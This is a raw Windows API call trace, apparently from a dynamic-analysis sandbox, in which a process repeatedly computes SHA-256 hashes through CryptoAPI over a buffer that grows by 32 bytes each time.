	[0214.524] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.524] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.524] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0214.524] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.524] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733ac0
	[0214.524] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733ac0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733ac0, pdwDataLen=0x128ba4) returned 1
	[0214.524] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.524] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.524] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.525] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.525] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0214.525] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.525] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733ae8
	[0214.525] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733ae8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733ae8, pdwDataLen=0x128ba4) returned 1
	[0214.525] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.525] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.525] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.525] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.525] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0214.525] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.525] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733b10
	[0214.526] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733b10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733b10, pdwDataLen=0x128ba4) returned 1
	[0214.526] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.526] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.526] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.526] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.526] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0214.526] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.526] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733b38
	[0214.526] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733b38, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733b38, pdwDataLen=0x128ba4) returned 1
	[0214.526] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.526] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.526] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.527] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.527] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0214.527] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733b60
	[0214.527] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733b60, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733b60, pdwDataLen=0x128ba4) returned 1
	[0214.527] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.527] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.527] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.527] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.527] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0214.527] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.527] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733b88
	[0214.527] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733b88, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733b88, pdwDataLen=0x128ba4) returned 1
	[0214.527] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.527] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.527] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.528] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.528] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0214.528] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.528] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733bb0
	[0214.528] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733bb0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733bb0, pdwDataLen=0x128ba4) returned 1
	[0214.528] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.528] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.528] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.528] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.528] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0214.528] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.528] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733bd8
	[0214.528] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733bd8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733bd8, pdwDataLen=0x128ba4) returned 1
	[0214.528] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.528] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.528] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.529] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.529] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0214.529] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.529] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733c00
	[0214.529] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733c00, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733c00, pdwDataLen=0x128ba4) returned 1
	[0214.529] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.529] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.529] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.529] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.529] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0214.529] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.529] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733c28
	[0214.530] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733c28, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733c28, pdwDataLen=0x128ba4) returned 1
	[0214.530] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.530] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.530] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.530] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.530] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0214.530] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.530] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733c50
	[0214.530] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733c50, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733c50, pdwDataLen=0x128ba4) returned 1
	[0214.530] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.530] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.530] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.531] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.531] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0214.531] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.531] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733c78
	[0214.531] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733c78, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733c78, pdwDataLen=0x128ba4) returned 1
	[0214.531] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.531] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.531] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.531] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.531] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0214.531] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.532] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733ca0
	[0214.539] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733ca0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733ca0, pdwDataLen=0x128ba4) returned 1
	[0214.539] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.539] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.539] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.539] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.539] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0214.539] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.539] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733cc8
	[0214.540] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733cc8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733cc8, pdwDataLen=0x128ba4) returned 1
	[0214.540] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.540] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.540] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.540] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.540] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0214.540] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.540] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733cf0
	[0214.540] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733cf0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733cf0, pdwDataLen=0x128ba4) returned 1
	[0214.540] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.540] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.540] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.541] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.541] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0214.541] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.541] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733d18
	[0214.541] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733d18, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733d18, pdwDataLen=0x128ba4) returned 1
	[0214.541] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.541] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.541] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.541] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.541] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0214.541] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.541] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733d40
	[0214.541] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733d40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733d40, pdwDataLen=0x128ba4) returned 1
	[0214.541] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.541] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.541] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.542] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.542] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0214.542] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.542] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733d68
	[0214.542] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733d68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733d68, pdwDataLen=0x128ba4) returned 1
	[0214.542] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.542] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.542] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.542] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.542] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0214.542] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.542] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733d90
	[0214.542] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733d90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733d90, pdwDataLen=0x128ba4) returned 1
	[0214.542] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.542] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.542] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.543] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.543] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0214.543] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.543] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733db8
	[0214.543] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733db8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733db8, pdwDataLen=0x128ba4) returned 1
	[0214.543] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.543] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.543] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.543] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.543] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0214.543] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.543] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733de0
	[0214.543] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733de0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733de0, pdwDataLen=0x128ba4) returned 1
	[0214.543] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.544] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.544] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.544] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.544] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0214.544] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.544] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733e08
	[0214.544] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733e08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733e08, pdwDataLen=0x128ba4) returned 1
	[0214.544] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.544] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.544] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.544] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.545] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0214.545] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.545] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733e30
	[0214.545] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733e30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733e30, pdwDataLen=0x128ba4) returned 1
	[0214.545] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.545] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.545] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.545] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.545] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0214.545] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.545] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733e58
	[0214.545] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733e58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733e58, pdwDataLen=0x128ba4) returned 1
	[0214.545] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.545] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.545] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.546] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.546] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0214.546] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.546] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733e80
	[0214.546] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733e80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733e80, pdwDataLen=0x128ba4) returned 1
	[0214.546] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.546] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.546] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
